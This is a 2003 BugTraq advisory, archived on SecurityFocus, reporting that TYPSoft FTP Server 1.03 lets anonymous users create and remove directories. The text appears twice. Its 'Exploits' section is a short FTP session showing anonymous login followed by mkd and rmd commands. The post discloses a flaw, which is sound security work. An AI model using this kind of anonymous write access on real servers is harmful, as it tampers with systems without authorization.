BugTraq
Back to list
|
Post reply
TYPSoft FTP Server
Mar 31 2003 10:34AM
subj (r2subj3ct dwclan org)
-------------------------------------------------------------
Product : TYPSoft FTP Server
Version : 1.03
OSystem : Windows
Authors : TYPSoft
WebSite : http://www.typsoft.com
Problem : Create and Remove directories with anonymous access
-------------------------------------------------------------
Description:
------------
eng:
====
During research of the given server, the following was established:
The anonymous user can create and delete directories.
Exploits:
---------
220 TYPSoft FTP Server 1.03 ready...
user anonymous
331 Password required for anonymous.
pass anonymoys (at) 127.0.0 (dot) 1 [email concealed]
230 User anonymous logged in.
pwd
257 "/C:/TEMP/" is current directory.
mkd subj
257 '/C:/TEMP/subj': directory created.
rmd subj
250 '/C:/TEMP/subj': directory removed.
Contacts:
---------
r2subj3ct (at) dwclan (dot) org [email concealed]
subj.24h.to (www.dwcgr0up.com/subj/)
www.dwcgr0up.com
irc.dwcgr0up.biz #dwc
Thanks:
-------
DHG, GipsHack, Netp0is0n, de1irium, r00tc0de, f0kp, exploit.ru, nobodies
DethSpirit, r4ShRaY, D4rkGr3y, Moby, Orb, Foster, Owned, prior, Demon.
[ reply ]
Privacy Statement
Copyright 2010, SecurityFocus
-------------------------------------------------------------
Product : TYPSoft FTP Server
Version : 1.03
OSystem : Windows
Authors : TYPSoft
WebSite : http://www.typsoft.com
Problem : Create and Remove directories with anonymous access
-------------------------------------------------------------
Description:
------------
eng:
====
During research of the given server, the following was established:
The anonymous user can create and delete directories.
Exploits:
---------
220 TYPSoft FTP Server 1.03 ready...
user anonymous
331 Password required for anonymous.
pass anonymoys (at) 127.0.0 (dot) 1 [email concealed]
230 User anonymous logged in.
pwd
257 "/C:/TEMP/" is current directory.
mkd subj
257 '/C:/TEMP/subj': directory created.
rmd subj
250 '/C:/TEMP/subj': directory removed.
Contacts:
---------
r2subj3ct (at) dwclan (dot) org [email concealed]
subj.24h.to (www.dwcgr0up.com/subj/)
www.dwcgr0up.com
irc.dwcgr0up.biz #dwc
Thanks:
-------
DHG, GipsHack, Netp0is0n, de1irium, r00tc0de, f0kp, exploit.ru, nobodies
DethSpirit, r4ShRaY, D4rkGr3y, Moby, Orb, Foster, Owned, prior, Demon.
[ reply ]